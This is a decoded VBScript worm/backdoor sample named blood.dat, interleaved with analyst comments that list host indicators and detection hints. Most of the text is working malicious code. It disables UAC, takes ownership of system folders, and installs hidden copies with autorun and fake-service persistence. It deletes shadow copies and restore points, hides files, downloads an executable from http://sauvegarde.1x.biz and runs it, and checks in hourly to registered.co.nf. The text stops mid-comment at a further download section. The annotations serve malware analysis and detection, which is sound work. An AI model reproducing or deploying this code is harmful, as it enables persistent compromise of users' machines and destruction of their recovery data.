decoded_blood.dat
'''''' | |
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ | |
'''''' ||| v 39.13 ¤ B0t ||| | |
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ | |
'''''' | |
' /\ | |
' Error handling is switched off for everything that follows, so a failed
' registry read or write below does not stop the script.
On Error Resume Next | |
' Fixed 5-second delay before any other action.
wscript.sleep 5000 | |
' /\ | |
'--------------------------------------------------------------------------- | |
' ??????????????? |3yP4ss wscript t!m30ut !!!!!!!!!!!!!!!!! ' | |
'--------------------------------------------------------------------------- | |
' | |
Dim oShell | |
' | |
Dim wscr,rr | |
Set wscr=CreateObject("WScript.Shell") | |
' Reads the per-user Windows Script Host "Timeout" setting. A value >= 1
' presumably means WSH would terminate long-running scripts - confirm against
' the WSH documentation.
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout") | |
If (rr>=1) Then | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
' Hidden cmd.exe (window style 0) that sets DisableRegistryTools=0, forces the
' WSH Timeout value to 0, then starts this script again by file name.
' Detection: wscript.exe spawning cmd.exe with "reg add" against
' "Windows Script Host\Settings" /v Timeout.
oShell.run "cmd /K REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v DisableRegistryTools /t REG_DWORD /d 0 /f & reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings"" /v Timeout /t reg_dword /d 0 /f & start "&wscript.Scriptname&" & exit",0 | |
Set oShell = Nothing | |
' | |
Else | |
End If | |
' | |
'----------------------------------------------------------------------- | |
' ~VAR~ ! | |
'----------------------------------------------------------------------- | |
' | |
' Path and shell-object setup used by the later sections.
Dim oFS, NomFichier | |
Set oFS = CreateObject("Scripting.FileSystemObject") | |
' NomFichier: absolute path derived from the script's own file name;
' nom: the bare file name. Both are later written into the installer batch.
NomFichier = oFS.GetAbsolutePathName(""&wscript.Scriptname&"") | |
nom = wscript.Scriptname | |
Set oFS = Nothing | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set WSSH = CreateObject("Wscript.shell") | |
Set wshshell=createobject("wscript.shell") | |
' dema = %allusersprofile%, sys = %systemroot%, var1 = %systemdrive%.
dema=wshshell.expandenvironmentstrings("%allusersprofile%") | |
sys=wshshell.expandenvironmentstrings("%systemroot%") | |
var1=wshshell.expandenvironmentstrings("%systemdrive%") ' R00T + TMP | |
' MyF is the path of the installed copy (<systemdrive>\security\blood.dat);
' that path is a host indicator for this sample.
MyF = ""&var1&"\security\blood.dat" | |
' | |
Dim shell | |
Set shell = WScript.CreateObject("WScript.Shell") | |
Set wscr = CreateObject("WScript.Shell") | |
' | |
'--------------------------------------------------------------------------- | |
' servi off | on | |
'--------------------------------------------------------------------------- | |
' | |
' isServiceRunning(strComputer, strServiceName)
' Returns TRUE when WMI reports at least one Win32_Service instance named
' strServiceName in state 'Running' on strComputer, otherwise FALSE.
' The WQL text is built by plain string concatenation of strServiceName.
Function isServiceRunning(strComputer,strServiceName) | |
Dim objWMIService, strWMIQuery | |
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'" | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") | |
If objWMIService.ExecQuery(strWMIQuery).Count > 0 Then | |
isServiceRunning = TRUE | |
Else | |
isServiceRunning = FALSE | |
End If | |
End Function | |
' Already-installed check. The script exits early only when ALL of these hold:
'   - a service named "system" is running on the local machine,
'   - the registry marker ...\policies\explorer\sdate\sdate is >= 39,
'   - at least two wscript.exe processes exist,
'   - <systemdrive>\security\svchost.exe exists,
'   - <systemroot>\system32\system\msg\config.txt exists.
' For responders, each of these is a host indicator to look for when scoping
' an infection.
'option explicit | |
Dim strComputer,strServiceName | |
strComputer = "." ' Local Computer | |
strServiceName = "system" ' Windows Service | |
If isServiceRunning(strComputer,strServiceName) Then | |
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\explorer\sdate\sdate") | |
If (ab >= 39) Then 'Last version | |
Set objWMI = GetObject("winmgmts:root\cimv2") | |
sQuery = "Select * from Win32_process Where Name = 'wscript.exe'" | |
if objWMI.execquery(sQuery).Count >= 2 Then | |
set fsO = CreateObject("Scripting.FileSystemObject") | |
If fsO.FileExists(""&var1&"\security\svchost.exe") Then | |
If fsO.FileExists(""&sys&"\system32\system\msg\config.txt") Then | |
wscript.quit | |
Else | |
End If | |
End If | |
End If | |
End If | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' CMD = on | |
'--------------------------------------------------------------------------- | |
' | |
' Writes the per-user policy value DisableCMD = 0 under
' HKCU\SOFTWARE\Policies\Microsoft\Windows\System, so a policy that blocks
' cmd.exe for this user is cleared before the cmd-based steps below run.
' Detection: a script host writing to this policy key.
Dim objShell | |
Dim strMessage, welcome, goodbye | |
' | |
' Set the string values | |
welcome = "DisableCMD" ' New Key | |
goodbye = "HKCU\SOFTWARE\Policies\" _ | |
& "Microsoft\Windows\System\" | |
' | |
' Create the Shell object | |
Set objShell = CreateObject("WScript.Shell") | |
' | |
' This is the registry write that actually changes the policy value. | |
objShell.RegWrite goodbye & welcome, 0, "REG_DWORD" | |
' | |
'--------------------------------------------------------------------------- | |
' UAC = 0 + REG = 1 | |
'--------------------------------------------------------------------------- | |
' | |
' UAC tampering. If EnableLUA cannot be read or equals 1, the script writes
' %temp%\uac.bat, runs it hidden and waits for it, then deletes it.
' What the generated batch does, as far as the written lines show:
'   - continues only when "ver" reports version 6.0 or 6.1,
'   - builds %temp%\ADMIN.vbe, which uses ShellExecute with the "runas" verb to
'     launch %temp%\CPBA.bat,
'   - builds %temp%\CPBA.bat, which adds a "rescue" value under
'     HKLM\...\Policies\Explorer\Run and sets ConsentPromptBehaviorAdmin=0 and
'     EnableLUA=0,
'   - re-launches itself until "reg query" shows EnableLUA as 0x0.
' Detection: changes to EnableLUA / ConsentPromptBehaviorAdmin, and short-lived
' ADMIN.vbe, CPBA.bat, tp.vbe or uac.bat files in %temp%.
Set wscr = CreateObject("WScript.Shell") | |
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\system\EnableLUA") | |
If (err.number <> 0 Or ab = 1) Then | |
Const ForReading = 1 , ForWriting = 2 , ForAppending = 8 | |
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomfichhh=tmpdir & "\uac.bat" | |
' msgbox nomfic | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true) | |
' | |
f.writeline "@echo off" | |
f.writeline "mode con lines=1 cols=14" | |
f.writeline "ver | find /i ""version 6.1."" > nul" | |
f.writeline "if %errorlevel%==0 GoTo patch" | |
f.writeline "ver | find /i ""version 6.0."" > nul" | |
f.writeline "if %errorlevel%==0 GoTo patch" | |
f.writeline ":exit" | |
f.writeline "exit" | |
f.writeline ":patch" | |
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul " | |
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul " | |
' | |
f.writeline "echo Set objshell = createobject(""shell.application"") > ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo Set fsO = createobject(""scripting.filesystemobject"") >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo objshell.shellexecute ""cmd.exe"", ""/c"" ^& Chr(34) ^& strpath ^& ""\CPBA.bat"" ^& Chr(34), """", ""runas"", 0 >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo wscript.sleep 1000 >> ""%temp%\ADMIN.vbe"" " | |
' reg = on | |
f.writeline "echo On Error Resume Next >> ""%temp%\tp.vbe"" " | |
f.writeline "echo WScript.CreateObject(""WScript.Shell"").RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"",0, ""REG_DWORD"" >> ""%temp%\tp.vbe"" " | |
f.writeline "echo ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo del/f/q ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" " | |
' | |
f.writeline "echo REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v rescue /d """""""""&dema&"\rescue.vbe"""""""" >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" " | |
f.writeline "start """" /wait ""%temp%\ADMIN.vbe"" " | |
f.writeline " reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i ""0x0"" >nul " | |
f.writeline " If %errorlevel%==0 GoTo ok " | |
f.writeline " start """"/wait/MAX ""%temp%\uac.bat"" " | |
f.writeline ":ok" | |
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul " | |
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul " | |
f.writeline "EXIT" | |
f.close | |
' | |
Set variable = createobject("wscript.shell") | |
' Window style 0 (hidden), bWaitOnReturn = true: the script blocks until the
' batch finishes.
variable.run ""&nomfichhh&"" ,0,true | |
' delete the temp file | |
fso.DeleteFile nomfichhh, TRUE | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' 0wn3r | |
'--------------------------------------------------------------------------- | |
' | |
' Ownership / ACL changes, run in a hidden cmd.exe: takeown plus CACLS/ICACLS
' grant the current user Full control over <systemdrive>\kernel,
' <systemdrive>\security, %SystemRoot%\System32\wscript.exe and
' "System Volume Information", and take ownership of %allusersprofile%.
' Detection: a script host spawning takeown/cacls/icacls against wscript.exe
' or System Volume Information is a strong anomaly.
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K takeown /F %systemdrive%\kernel /A /R /D O & CACLS %systemdrive%\Kernel /E /T /C /G %username%:F & takeown /F %systemdrive%\security /A /R /D O & CACLS %systemdrive%\security /E /T /C /G %username%:F & takeown /F ""%allusersprofile%\"" /A /R /D O & takeown /a /f %SystemRoot%\System32\wscript.exe & ICACLS %SystemRoot%\System32\wscript.exe /Grant %username%:F & takeown /F ""%systemdrive%\system Volume Information"" /A /R /D O & CACLS ""%systemdrive%\system Volume Information"" /E /T /C /G %username%:F & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' Install me | |
'--------------------------------------------------------------------------- | |
' | |
' Installation step. Clears the per-user disabletaskmgr and DisableRegistryTools
' policy values, then writes %temp%\tmp.bat, runs it hidden (waiting for it)
' and deletes it. The generated batch, as written below:
'   - counts lines of <systemdrive>\security\blood.dat and jumps to :exitt when
'     the count is >= 24 (looks like an "already installed" test),
'   - changes the icon shown for .vbe files (HKCR\VBEFile\DefaultIcon),
'   - deletes config.dat from the root of drives B: to Z:,
'   - creates <systemdrive>\Kernel and <systemdrive>\security, each with an
'     "lpt1" subfolder (a reserved device name; the author's "NO DEATH dir"
'     remark suggests it is meant to hinder deletion - confirm),
'   - marks both folders system+hidden and stores copies of this script as
'     security\blood.dat and kernel\r00t3r,
'   - re-registers every DLL and EXE in %windir%\wbem.
' Detection: hidden+system directories named "kernel" or "security" in the
' root of the system drive, and extension-less or .dat files run by wscript.
WScript.CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", 0, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" | |
' | |
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomfic=tmpdir & "\tmp.bat" | |
' msgbox nomfic | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfic, ForWriting , true) | |
' | |
f.writeline "for /f ""delims="" %%i in 'type """&var1&"\security\blood.dat""') do set /a Compt+=1 " | |
f.writeline "if '%Compt%' GEQ '24' goto exitt " ' greater than or equal | |
f.writeline "reg add ""HKCR\VBEFile\DefaultIcon"" /v """" /t ""REG_SZ"" /d ""%SystemRoot%\system32\shell32.dll,1"" /f" | |
f.writeline "xcopy /C /H /Y /R """&var1&"\kernel\*.vbe"" ""%temp%\"" " | |
f.writeline "xcopy /C /H /Y /R """&NomFichier&""" ""%temp%\"" " | |
f.writeline "attrib -s -h ""%temp%\"&nom&""" " | |
f.writeline "if Not exist ""%temp%\"&nom&""" GoTo Exit " | |
' | |
f.writeline "for %%E In (B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( del/f/q/A %%E:\config.dat ) " | |
f.writeline "md """&var1&"\Kernel"" " ' R00t3r | |
f.writeline "md """&var1&"\Kernel\\lpt1\\"" " ' NO DEATH dir | |
f.writeline "md """&var1&"\security"" " 'TMP | |
f.writeline "md """&var1&"\security\\lpt1\\"" " ' Idem | |
' | |
f.writeline "attrib +s +h """&var1&"\security"" " | |
f.writeline "attrib +s +h """&var1&"\kernel"" " | |
f.writeline "del/f/q/a """&var1&"\security\*.*"" " | |
f.writeline "del/f/q/a """&var1&"\kernel\*.*"" " | |
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\security\"" " | |
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\kernel\"" " | |
f.writeline "del/f/q/a ""%temp%\"&nom&" " | |
f.writeline "ren """&var1&"\kernel\"&nom&""" r00t3r" 'r00t | |
f.writeline "ren """&var1&"\security\"&nom&""" blood.dat " | |
f.writeline "attrib +s +h """&var1&"\kernel\r00t3r"" " | |
' | |
f.writeline ":exit" | |
' | |
f.writeline "cd /d %windir%\wbem" | |
f.writeline "for %i in (*.dll) Do RegSvr32 -s %i" | |
f.writeline "for %i in (*.exe) Do %i /RegServer" | |
f.writeline "EXIT" | |
f.writeline ":exitt" | |
f.close | |
' | |
set variable = createobject("wscript.shell") | |
variable.run ""&nomfic&"" ,0,true | |
' delete the temp file | |
fso.DeleteFile nomfic, TRUE | |
'--------------------------------------------------------------------------- | |
' R00t3r | |
'--------------------------------------------------------------------------- | |
' | |
' Persistence set-up, part 1.
'   - Copies the legitimate %systemroot%\system32\wscript.exe to
'     <systemdrive>\security\svchost.exe, i.e. the script host under a
'     system-process name. Detection: a binary named svchost.exe outside
'     System32, or one whose original file name is wscript.exe.
'   - Writes <systemdrive>\security\system.vbs, a two-line launcher that runs
'     that renamed script host with /e:VBScript.Encode on security\blood.dat.
'   - Adds the autorun value "rescue" under HKLM\...\Policies\Explorer\Run,
'     pointing at %allusersprofile%\rescue.vbe.
'   - Creates %systemroot%\system32\system\msg and writes config.txt there
'     with service-style settings whose Source is security\system.vbs. Which
'     component reads config.txt is not visible in this part of the script.
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
rep=wshshell.expandenvironmentstrings("%systemdrive%") | |
drv=wshshell.expandenvironmentstrings("%systemroot%") | |
' | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&drv&"\system32\wscript.exe",""&rep&"\security\svchost.exe" | |
' | |
'--------------------------------------------------------------------------- | |
' | |
tmpdir=shell.ExpandEnvironmentStrings("%systemdrive%") | |
nomfichhh=tmpdir & "\security\system.vbs" | |
' msgbox nomfic | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true) | |
' | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run ""svchost.exe /e:VBScript.Encode """""&tmpdir&"\security\blood.dat"",false " | |
f.close | |
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\rescue",""""&dema&"\rescue.vbe""", "REG_SZ" | |
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
drv=wshshell.expandenvironmentstrings("%systemroot%") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
' | |
oShell.run "cmd /K md %systemroot%\system32\system & md %systemroot%\system32\system\msg & EXIT",0 | |
Set oShell = Nothing | |
' Waits 3 seconds, presumably so the directories exist before config.txt is
' written by the next command.
wscript.sleep 3000 | |
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&@echo ServiceType=272& echo WaitActive=0&@echo StartType=2&@echo ErrorControl=1&@echo Source=%systemdrive%\security\system.vbs&@echo ResetPeriod=0&@echo RebootMsg=&@echo Command=&@echo nActions=0&@ echo Actions=&@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt & EXIT",0 | |
Set oShell = Nothing | |
' | |
'---------------------------------------------------------------------------- | |
' | |
' Second definition of isServiceRunning in this file; the logic is the same as
' the earlier one. Returns TRUE when WMI reports a Win32_Service named
' strServiceName in state 'Running' on strComputer, otherwise FALSE.
Function isServiceRunning(strComputer,strServiceName) | |
Dim objWMIService, strWMIQuery | |
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'" | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") | |
if objWMIService.ExecQuery(strWMIQuery).Count > 0 Then | |
isServiceRunning = TRUE | |
else | |
isServiceRunning = FALSE | |
end If | |
End Function | |
' Persistence set-up, part 2: drops an embedded binary and registers it as a
' Windows service.
'   - Opens the running script file, skips its first 28 lines, then treats
'     each following line as hex: starting at character 2, every pair of
'     characters is converted to one byte and written to
'     %systemroot%\system32\system\svchost.exe. Presumably the encoded
'     original carries the payload as hex lines behind a one-character prefix;
'     that data is not part of this decoded listing.
'   - If no service named "system" is running, creates it with "sc create"
'     (auto start, binPath = that svchost.exe with argument "msg"), starts it,
'     and sets a French description that poses as a generic Windows process.
'   - Writes the marker value sdate = "39" under
'     HKLM\...\Policies\Explorer\sdate.
' Detection: service creation events for a service named "system" whose image
' path is under System32\system\, and the sdate registry marker.
Dim fso, f, f2, ts, ts2 | |
Dim Ligne, i | |
Set FSO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.GetFile(WScript.ScriptFullName) | |
Set ts = f.OpenAsTextStream(1, -2) | |
fso.CreateTextFile ""&drv&"\system32\system\svchost.exe" | |
Set f2 = fso.GetFile(""&drv&"\system32\system\svchost.exe") | |
Set ts2 = f2.OpenAsTextStream(2, -2) | |
For i=1 To 28 | |
ts.skipline | |
Next | |
Do | |
Ligne = ts.readline | |
For i=2 To Len(Ligne) Step 2 | |
ts2.write chr( "&h" & mid(Ligne,i,2)) | |
Next | |
Loop Until ts.AtEndOfStream | |
ts.Close | |
ts2.Close | |
'option explicit | |
strComputer = "." ' Local Computer | |
strServiceName = "system" ' Service N4m3 | |
If isServiceRunning(strComputer,strServiceName) Then | |
Else | |
Set wshshell=createobject("wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K sc create system binPath= ""%systemroot%\System32\system\svchost.exe msg"" start= auto & net start system & sc description system "" processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque 'etre endommagé. "" & EXIT",0 | |
Set oShell = Nothing | |
End If | |
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate","39", "REG_SZ" | |
' | |
'--------------------------------------------------------------------------- | |
' S3lf D3f3ns3 | |
'--------------------------------------------------------------------------- | |
' /%\ | |
' | |
' File-association tampering (the author's section title reads "self defense").
'   - Deletes HKCR\lnkfile\IsShortCut; this value normally controls how .lnk
'     files are presented in Explorer (shortcut overlay) - confirm the visible
'     effect on the target Windows version.
'   - Rewrites the open command for Notepad2.exe and notepad.exe, and the Edit
'     verb for batfile and VBEFile, so each points at
'     %SystemRoot%\System32\Notepad.exe.
' Remediation note: these HKCR values must be restored when cleaning a host;
' removing the dropped files alone does not undo them.
Dim strRoot, strDelete | |
strRoot = "HKEY_CLASSES_ROOT\lnkfile\IsShortCut" | |
' Create the Shell object | |
Set objShell = CreateObject("WScript.Shell") | |
strDelete = objShell.RegDelete(strRoot) | |
' | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\Notepad2.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
' | |
' \%/ | |
' | |
'--------------------------------------------------------------------------- | |
' CL34R 0|_|) | |
'--------------------------------------------------------------------------- | |
' | |
' Clean-up of older components: force-deletes named files under
' <systemdrive>\security and <systemdrive>\kernel plus %temp%\reskp.exe, and
' removes the directories <systemdrive>\system32 and <systemdrive>\system.
' Note the targets are relative to %systemdrive%, not %systemroot%. The file
' names listed here are additional host indicators, likely from earlier
' versions of the same family (inferred from the section title only).
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K del/f/q/s %systemdrive%\security\system.bat & del/f/q/s %systemdrive%\security\system.vbe & del/f/q/s %systemdrive%\security\index.exe & del/f/q/s %systemdrive%\security\system.exe & del/f/q/s %systemdrive%\kernel\explorer.exe & del/f/q/s %systemdrive%\kernel\update.exe & del/f/q/s ""%temp%\reskp.exe"" & rd/q/s %systemdrive%\system32 & rd/q/s %systemdrive%\system & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' ResKp /\ | |
'--------------------------------------------------------------------------- | |
' | |
' Writes the recovery script %allusersprofile%\rescue.vbe (the target of the
' "rescue" autorun value set elsewhere in this file). The generated script:
'   - sleeps 5 minutes, then launches <systemdrive>\kernel\r00t3r with
'     wscript.exe /e:VBScript.Encode,
'   - sleeps another 5 minutes, then downloads booter.dat over plain HTTP from
'     the host assigned to "mane", saves it in %temp%, copies it to reskp.exe
'     and runs it hidden when the file size equals the Content-Length header.
' The size comparison only catches truncated transfers; it does not
' authenticate the download.
' Detection: rescue.vbe in the All Users profile, wscript.exe invoked with
' /e:VBScript.Encode on a file without a script extension, and long start-up
' delays followed by an outbound HTTP GET from a script host.
r00t=shell.ExpandEnvironmentStrings("%Allusersprofile%") | |
bkdr=r00t & "\rescue.vbe" | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(bkdr, ForWriting , true) | |
f.writeline " On Error Resume Next " | |
f.writeline " wscript.sleep 300000 " ' 5 min | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run ""%systemroot%\system32\wscript.exe /e:VBScript.Encode """""&var1&"\kernel\r00t3r"",false " | |
f.writeline " wscript.sleep 300000 " '5min | |
f.writeline " Set shell = WScript.CreateObject(""WScript.Shell"") " | |
f.writeline " Set WshShell = Wscript.CreateObject(""Wscript.shell"") " | |
f.writeline " tmpdir=shell.ExpandEnvironmentStrings(""%temp%"") " | |
f.writeline " Set wshshell=createobject(""wscript.shell"") " | |
f.writeline " mane = ""http://sauvegarde.1x.biz/"" " | |
f.writeline " yow = ""booter."" " | |
f.writeline " fin = ""dat"" " | |
f.writeline " strFileURL = "" ""&mane&""""&yow&""""&fin&"" "" " | |
f.writeline " strHDLocation = tmpdir & ""\booter.dat"" " | |
f.writeline " Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"") " | |
f.writeline " objXMLHTTP.open ""GET"", strFileURL, FALSE " | |
f.writeline " objXMLHTTP.send() " | |
f.writeline " If objXMLHTTP.Status = 200 Then " | |
f.writeline " Set objADOStream = _ " | |
f.writeline " CreateObject(""ADODB.Stream"") " | |
f.writeline " objADOStream.Open " | |
f.writeline " objADOStream.Type = 1 'adTypeBinary " | |
f.writeline " objADOStream. _ " | |
f.writeline " Write _ " | |
f.writeline " objXMLHTTP _ " | |
f.writeline " .ResponseBody " | |
f.writeline " objADOStream. _ " | |
f.writeline " Position = 0 " | |
f.writeline " Set objFSO = _ " | |
f.writeline " Createobject(""Scripting.FileSystemObject"") " | |
f.writeline " If objFSO. _ " | |
f.writeline " Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation " | |
f.writeline " Set objFSO = Nothing " | |
f.writeline " objADOStream _ " | |
f.writeline " .SaveToFile strHDLocation " | |
f.writeline " objADOStream.Close " | |
f.writeline " Set objADOStream = Nothing " | |
f.writeline " End If " | |
f.writeline " a = objXMLHTTP.getResponseHeader(""Content-Length"") " | |
f.writeline " Set objXMLHTTP = Nothing " | |
'msgbox"2" | |
f.writeline " Set loFSO = CreateObject(""Scripting.FileSystemObject"") " | |
f.writeline " loFSO.CopyFile """"&tmpdir&""\booter.dat"",""""&tmpdir&""\reskp.exe"" " | |
f.writeline " loFSO.DeleteFile """"&tmpdir&""\booter.dat"" " | |
f.writeline " Set oFSO = CreateObject(""Scripting.FileSystemObject"") " | |
f.writeline " stFichier = """"&tmpdir&""\reskp.exe"" " | |
f.writeline " Set oFl = oFSO.GetFile(stFichier) " | |
f.writeline " b = oFl.size " | |
f.writeline " If """"&a&"""" = """"&b&"""" Then " | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run """"""""&tmpdir&""\reskp.exe"""""",0,False " | |
f.writeline " Else " | |
f.writeline " End If " | |
f.close | |
'-------------------------------------------------------------------------- | |
' Restaur 0 xp () 7v | |
'-------------------------------------------------------------------------- | |
' /\ | |
' Recovery inhibition. Through the WMI SystemRestore class the script calls
' Disable and then Enable (twice) with an empty drive string, then runs
' "vssadmin delete shadows /all /quiet" and force-deletes the contents of
' "System Volume Information" on the system drive. The Disable/Enable cycle
' presumably discards existing restore points - confirm on the target OS.
' Detection: vssadmin shadow deletion launched from a script host, and
' SystemRestore Disable calls made through WMI.
' /\ | |
On Error Resume Next | |
' \/ | |
Drive = "" ' all drives | |
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore") | |
ret=obj.Disable(Drive) | |
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore") | |
ret=obj.Enable(Drive) | |
ret=obj.Enable(Drive) | |
Set obj = Nothing | |
' | |
Set wshshell=createobject("wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K vssadmin delete shadows /all /quiet & cd/d ""%systemdrive%\system volume Information"" & del/f/s/q/a ""%systemdrive%\system volume Information\*.*"" & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' \/\/0Rm_._S4t/\N | |
'--------------------------------------------------------------------------- | |
' | |
' Main loop (runs forever; the matching Wend is further down the file).
' Each pass first spends 3600 seconds in an inner loop that calls
' detecterracines once per second, then performs the registry writes and
' network requests that follow.
prem = TotalTime | |
deux = Start | |
dern = PauseTime | |
' | |
While TRUE | |
dern = 3600 ' trigger interval: 1 hour | |
deux = Timer ' start time | |
Do While Timer < deux + dern | |
' | |
detecterracines | |
wscript.sleep 1000 | |
' | |
Loop | |
' LAUNCH | |
' | |
'--------------------------------------------------------------------------- | |
' C0mPtM3 & Def3nd3r m! | |
'--------------------------------------------------------------------------- | |
' | |
' Explorer is set to hide hidden and protected system files (Hidden = 2,
' ShowSuperHidden = 0), which keeps the hidden+system install folders out of
' view; DisableRegistryTools is cleared again on every pass.
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" | |
' | |
' Hourly HTTP GET to the URL in urlCert; the request is sent and aborted
' without the response being read, which looks like a check-in / infection
' counter (the section title reads "count me"). Detection: periodic plain-HTTP
' requests to this host from wscript.exe or the renamed script host.
On Error Resume Next | |
Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP") | |
urlCert = "http://registered.co.nf/sat39/index.php" | |
xmlHttp.Open "GET", urlCert, FALSE | |
xmlHttp.Send "" | |
xmlHttp.Abort | |
' | |
'--------------------------------------------------------------------------- | |
' Z0n3H | |
'--------------------------------------------------------------------------- | |
' | |
' Download-and-execute stanza ("zoneh"). Fetches zoneh.dat over plain HTTP from
